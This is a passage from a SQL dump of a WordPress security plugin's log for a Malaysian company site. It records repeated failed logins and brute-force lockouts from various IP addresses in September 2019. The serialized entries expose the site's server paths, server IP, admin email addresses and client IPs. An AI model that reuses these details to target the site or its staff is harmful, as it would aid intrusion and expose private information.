Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCiliJ7D9Gn7wDPh8VcQAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.137.253\";s:11:\"REMOTE_PORT\";s:5:\"48528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCiliJ7D9Gn7wDPh8VcQAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063562.9705\";s:12:\"REQUEST_TIME\";s:10:\"1569063562\";}}','notice','2019-09-21 10:59:24','2019-09-21 10:59:23',17802336,19288480,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.253'),(25410,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:59:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:59:02\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:14:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:14:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:59:03','2019-09-21 10:59:02',17886624,19288376,'https://bintara.com.my/test/wp-login.php',1,0,'89.221.219.30'),(25407,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:59:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:59:01\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:14:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:14:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:59:02','2019-09-21 10:59:01',17882928,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.179.219.7'),(25408,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:59:02','2019-09-21 10:59:01',18088536,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.179.219.7'),(25409,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCdnkXpgmG5P@iB8kPdwAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.221.219.30\";s:11:\"REMOTE_PORT\";s:5:\"35112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCdnkXpgmG5P@iB8kPdwAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063542.4066\";s:12:\"REQUEST_TIME\";s:10:\"1569063542\";}}','notice','2019-09-21 10:59:03','2019-09-21 10:59:02',17802152,19288376,'https://bintara.com.my/test/wp-login.php',1,0,'89.221.219.30'),(25406,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCdbfBTP0kPOVnb8jpcQAAAEI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"108.179.219.7\";s:11:\"REMOTE_PORT\";s:5:\"60404\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCdbfBTP0kPOVnb8jpcQAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063541.3622\";s:12:\"REQUEST_TIME\";s:10:\"1569063541\";}}','notice','2019-09-21 10:59:02','2019-09-21 10:59:01',17798176,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.179.219.7'),(25404,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:58:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:58:24\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:13:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:13:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:58:25','2019-09-21 10:58:24',17882152,19287608,'https://bintara.com.my/wp/wp-login.php',1,0,'198.12.149.33'),(25405,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:58:25','2019-09-21 10:58:24',18088048,19287608,'https://bintara.com.my/wp/wp-login.php',1,0,'198.12.149.33'),(25402,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:58:18','2019-09-21 10:58:17',18089792,19288976,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.244.150'),(25403,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCT7fBTP0kPOVnb8jpbQAAAEg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.12.149.33\";s:11:\"REMOTE_PORT\";s:5:\"58426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCT7fBTP0kPOVnb8jpbQAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063504.0563\";s:12:\"REQUEST_TIME\";s:10:\"1569063504\";}}','notice','2019-09-21 10:58:25','2019-09-21 10:58:24',17797336,19287608,'https://bintara.com.my/wp/wp-login.php',1,0,'198.12.149.33'),(25401,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:58:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:58:17\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:13:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:13:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:58:18','2019-09-21 10:58:17',17883976,19288976,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.244.150'),(25398,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:57:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:57:40\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:12:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:12:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:57:41','2019-09-21 10:57:40',17884312,19289784,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.221.116'),(25399,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:57:41','2019-09-21 10:57:40',18089904,19289784,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.221.116'),(25400,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCSbfBTP0kPOVnb8jpagAAAEU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.244.150\";s:11:\"REMOTE_PORT\";s:5:\"36514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCSbfBTP0kPOVnb8jpagAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063497.5064\";s:12:\"REQUEST_TIME\";s:10:\"1569063497\";}}','notice','2019-09-21 10:58:18','2019-09-21 10:58:17',17799112,19288976,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.244.150'),(25395,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:57:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:57:23\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:12:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:12:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:57:25','2019-09-21 10:57:23',17884408,19289168,'https://bintara.com.my/blog/wp-login.php',1,0,'46.45.160.75'),(25396,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:57:25','2019-09-21 10:57:23',18090064,19289168,'https://bintara.com.my/blog/wp-login.php',1,0,'46.45.160.75'),(25397,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCI7fBTP0kPOVnb8jpZgAAAEI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"36451\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCI7fBTP0kPOVnb8jpZgAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063459.7008\";s:12:\"REQUEST_TIME\";s:10:\"1569063459\";}}','notice','2019-09-21 10:57:41','2019-09-21 10:57:40',17799360,19289784,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.221.116'),(25393,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:57:16','2019-09-21 10:57:15',18088800,19288520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.221.116'),(25394,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 